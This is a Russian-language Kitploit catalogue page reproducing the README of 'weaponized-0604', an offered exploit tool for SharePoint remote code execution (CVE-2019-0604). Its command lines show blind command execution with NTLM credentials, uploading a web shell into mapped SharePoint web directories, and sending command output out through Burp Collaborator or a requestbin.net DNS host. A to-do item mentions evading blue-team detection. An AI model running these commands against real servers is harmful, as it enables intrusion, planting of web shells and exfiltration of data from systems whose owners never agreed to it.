Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
weaponized-0604 — Автоматизированный инструмент для эксплуатации уязвимости SharePoint CVE-2019-0604 | Kitploit
Инструменты/GitHubGitHub/gh0st0ne/weaponized-0604
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubgh0st0ne/weaponized-0604

weaponized-0604

Автоматизированный инструмент для эксплуатации уязвимости SharePoint CVE-2019-0604

Репозиторий
85 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Weaponized CVE-2019-0604

Automated Exploit Tool to Maximize CVE-2019-0604.

Требования

Файл requirements.txt должен содержать список всех библиотек Python, используемых этим инструментом; они будут установлены с помощью

root@kitploit:~
$ pip install -r requirements.txt

Ручная слепая эксплуатация (с учетными данными или без них)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>

Функция загрузки

Загружайте что угодно интересное (веб-шелл, инструмент для разведки ...)

root@kitploit:~
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx

Сопоставление каталогов

root@kitploit:~
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/

Использование OOB для получения результата команды

С расширением Burp collaborator_http_api

  1. Установите collaborator_http_api.py в BurpSuite (Pro)?

  2. Убедитесь, что BurpSuite запущен на той же машине, что и этот эксплойт.

  3. Запускайте и наслаждайтесь полученным выводом :)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

sharepoint-rce-oob-demo

С DNSLog, например requestbin.net

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"

Получение данных из DNS

root@kitploit:~
2050524956494c4547455320494e464f524d4154494f4e
...

Расшифруйте сами :)

root@kitploit:~
 PRIVILEGES INFORMATION
...

TODO

  • Парсер аргументов
  • SharePoint, CVE-2019-0604
  • разбить cmd на несколько частей (в args.cmds)
  • указывать бинарный файл по требованию, избегая обнаружения синей командой. (сейчас cmd.exe захардкожен)

Автор

  • Tree
Скачать инструмент